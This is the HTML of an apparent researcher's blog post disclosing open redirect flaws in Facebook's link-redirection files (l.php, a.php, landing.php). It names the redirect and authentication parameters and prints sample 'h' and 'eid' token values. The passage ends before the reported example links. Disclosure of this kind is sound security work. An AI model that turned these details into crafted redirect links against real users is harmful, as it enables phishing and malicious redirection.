<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"> </span></b><br />
<br />
<b><span style="font-family: Arial, Helvetica, sans-serif;">Facebook Old Generated URLs Still Vulnerable to Open Redirect Attacks & A New Open Redirect Web Security Bugs</span></b></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b></span><span style="font-family: Arial, Helvetica, sans-serif;"><b>Domain:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.facebook.com/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.facebook.com</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">"Facebook
is an online social networking service headquartered in Menlo Park,
California. Its website was launched on February 4, 2004, by Mark
Zuckerberg with his college roommates and fellow Harvard University
students Eduardo Saverin, Andrew McCollum, Dustin Moskovitz and Chris
Hughes. The founders had initially limited the website's membership to
Harvard students, but later expanded it to colleges in the Boston area,
the Ivy League, and Stanford University. It gradually added support for
students at various other universities and later to high-school
students. Since 2006, anyone who is at least 13 years old is allowed to
become a registered user of the website, though the age requirement may
be higher depending on applicable local laws. Its name comes from a
colloquialism for the directory given to it by American universities
students." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"Facebook
had over 1.44 billion monthly active users as of March 2015.Because of
the large volume of data users submit to the service, Facebook has come
under scrutiny for their privacy policies. Facebook, Inc. held its
initial public offering in February 2012 and began selling stock to the
public three months later, reaching an original peak market
capitalization of $104 billion. As of February 2015 Facebook reached a
market capitalization of $212 Billion." (Wikipedia)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b>Discover:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><span style="line-height: 17.8181819915772px; text-align: justify;">Wang Jing, </span><span style="line-height: 17.8181819915772px; text-align: justify;">Division of Mathematical Sciences (MAS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">School of Physical and Mathematical Sciences (SPMS), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Nanyang Technological University (NTU), </span><span style="line-height: 17.8181819915772px; text-align: justify;">Singapore. (<a href="https://twitter.com/justqdjing/status/554206258413043713" target="_blank">@justqdjing</a>)</span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://www.tetraph.com/wangjing/" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/<wbr></wbr>wangjing/</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; margin: 0px; text-align: center;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) General Vulnerabilities Description:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.1)</b> <b>Two Facebook vulnerabilities are introduced in this article.</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Facebook
has a computer cyber security bug problem. It can be exploited by Open
Redirect attacks. This could allow a user to create a specially crafted
URL, that if clicked, would redirect a victim from the intended
legitimate web site to an arbitrary web site of the attacker's choosing.
Such attacks are useful as the crafted URL initially appear to be a web
page of a trusted site. This could be leveraged to direct an
unsuspecting user to a web page containing attacks that target client
side software such as a web browser or document rendering programs.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Since
Facebook is trusted by large numbers of other websites. Those
vulnerabilities can be used to do "Covert Redirect" to other websites
such as Amazon, eBay, Go-daddy, Yahoo, 163, Mail.ru etc.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.1.1)</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">One
Facebook Open Redirect vulnerability was reported to Facebook. Facebook
adopted a new mechanism to patch it. Though the reported URL
redirection vulnerabilities are patched. However, all old generated URLs
are still vulnerable to the attacks. Section (2) gives detail of it.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The
reason may be related to Facebook's third-party interaction system or
database management system or both. Another reason may be related to
Facebook's design for different kind of browsers. </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.1.2)</b> Another new Open Redirect vulnerability related to Facebook is introduced, too. For reference, please read section (3).</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">The
vulnerabilities can be attacked without user login. Tests were
performed on IE (9.0) of Windows 8, Firefox (24.0) & Google
Chromium 30.0.1599.114 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu
(12.10),Safari 6.1.6 of Mac OS X Lion 10.7.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(1.2)</b> Facebook's URL Redirection System Related to "*.php" Files</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">All URLs' redirection are based on several files, such l.php, a.php, landing.php and so on. </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">The main redirection are based on file "l.php" (Almost all redirection links are using it right now). </span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">For
file "l.php", one parameter "h" is used for authentication. When it
mentions to file "a.php", parameter "eid" is used for authentication.
All those two files use parameter "u" for the url redirected to. In some
other files such as "landing.php", parameters such as "url", "next" are
used.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><1>For parameter "h", two forms of authentication are used.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> <a>h=HAQHyinFq</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> <b>h=<wbr></wbr>hAQHalW1CAQHrkVIQNNqgwhxRWLNsF<wbr></wbr>VeH3auuImlbR1CgKA</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><2>For parameter "eid", one form of authentication is used.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"> <a>eid=<wbr></wbr>AQLP8sRq6lbU0jz0lARx9A9uetB6FI<wbr></wbr>F1N2-Yjj_ePj0d_<wbr></wbr>ezubjstZeDo6qDsalKVJwy6uDb_hQ-<wbr></wbr>9tBsA2dVoQRq0lniOu0os_<wbr></wbr>gPe3gY5l8lYblhQSwBtdvgjXjNqaxL<wbr></wbr>ZMYoasr3vv46tFsh1fL7q4kjT2LFw5<wbr></wbr>2dnJWd4SE8qc0YuPWfgPeQywgM2wl0<wbr></wbr>CoW-<wbr></wbr>lftWkr2dX0dLcytyHjXnvhKfVS_<wbr></wbr>pQBllszUzsPENxE6EuZ-<wbr></wbr>53Lh188o56idnfyyk2L58pE7C94PF-<wbr></wbr>za4ZVB0qbuA2EnPcSJI-<wbr></wbr>7oIiIJmIhifHe0CYTzG512-Z_<wbr></wbr>heN44VlyJHevhS9auAR8-<wbr></wbr>lFCAIlYymnT_<wbr></wbr>Qiwp92RxjNOfBypBvszQUrvB6PH3fA<wbr></wbr>Nn1prfMBVm4RD_<wbr></wbr>GFel14KVDS5USswbTOTkL3sZNhHUqq<wbr></wbr>PHwBwU3JFePMMuwsfesigH85B_<wbr></wbr>AxCsXUIWN7klKGSq8bPPsKSHttsa9h<wbr></wbr>kkMpSfRKL7D_<wbr></wbr>xwW4dU2xlmfGWil7jYRJmwfbOeF0zu<wbr></wbr>jk1FRBuM757tbfFMav-J-<wbr></wbr>K9npbdrDrCuUVqV__Tf7CGZ89nPl-<wbr></wbr>M2d09pE9enJj0OBXOaSXZX16LKaYnv<wbr></wbr>1Wh4GKme7C-EOunITxyQtp1zy-<wbr></wbr>48Uaz9mxO2x4bw7sBDfzDStF_Al8_<wbr></wbr>0SMjWNTh-J38rBHAgT96X-<wbr></wbr>dPFI43HU3x3fVymE9szrclBpvTaSfY<wbr></wbr>ezatgMzf77s3lQrQAMSlwSSRIzRuoF<wbr></wbr>vQBmWKT0T5ZFgH5ykhYKhNMiKj577U<wbr></wbr>O5g2Ojm-_-KKF4N_DBuG5R-<wbr></wbr>I6EOSlhok2xUkpKVDnDcxZFTLxGmx5<wbr></wbr>xc56J5kZLjJ96wnF2fH09Q19Qc2aU3<wbr></wbr>xYFlEFrKjrlLpwGyOyCDx7_<wbr></wbr>z7y1O4Efqew3Fa0Cb9s6Kk2jpLF5XE<wbr></wbr>IaYzzXOLAffxXG6icBJVovb9RPmiZ5<wbr></wbr>s9dKYYotLol68_X04O05bEvVccPEh-<wbr></wbr>IQwX_<wbr></wbr>VTMt3f23be2MECEqR2l1A1ZkJx4qP0<wbr></wbr>0GI1pZhU_<wbr></wbr>CXAnjSaTNmtaINRUeSsLNEZZsPwpWJ<wbr></wbr>MfeeGSwuof9krC05eSWjO0jH9tua0K<wbr></wbr>teMYhj8i-<wbr></wbr>3dwSBp4f7nMcFwH5ltfCLhMCYNB8rx<wbr></wbr>gzcAczyhLIo2UY-<wbr></wbr>3FSaJXBZ0lvuZBvnj7myUnyc2lCcy-<wbr></wbr>fWh93MRRaJrrinjtfr9fDSMHM9Cja5<wbr></wbr>xi0eG3Vs0aClnWbeJZA79TvmYt7E53<wbr></wbr>HfwGuv5-EJOqRh3cwZF-<wbr></wbr>53uPHA73ikUk3xTApjQunJM4uIBhpy<wbr></wbr>7iBIgn_<wbr></wbr>OXXo3X03YUJtJcDuC20ocJbZ310VHl<wbr></wbr>iox5tYZF2oiMaOfgo9Y9KeqgsrJgwP<wbr></wbr>CJeif4aB0Ne4g_oM_<wbr></wbr>Tuqt2pXbdgoCawHIApF087eFKJqejp<wbr></wbr>0jpEkJerXPyK-IqsD_SQfIm_<wbr></wbr>2WJSkzwzATwQKs</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijRvRlzyViMgAr3yrxYKI-MxLhCK7OAYmG-2ORBZrWqQYFOI5v_tfSxGwuNfQfurZSgcOVM9zKsyf-oUzZzgBQF7bKm2R0rwqS4dRzlI_jnLcLFs2mdpK5xTeoCN59ZRJgZO6SRA9WtrjN/s1600/facebook_1.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijRvRlzyViMgAr3yrxYKI-MxLhCK7OAYmG-2ORBZrWqQYFOI5v_tfSxGwuNfQfurZSgcOVM9zKsyf-oUzZzgBQF7bKm2R0rwqS4dRzlI_jnLcLFs2mdpK5xTeoCN59ZRJgZO6SRA9WtrjN/s400/facebook_1.png" width="400" /></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b> </b></span></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<br />
<br /></div>
<div style="margin: 0px;">
<br /></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2) Vulnerability Description 1:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1)</b> A security researcher reported two Open Redirect vulnerabilities to Facebook in 2013. The following are the two links reported.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
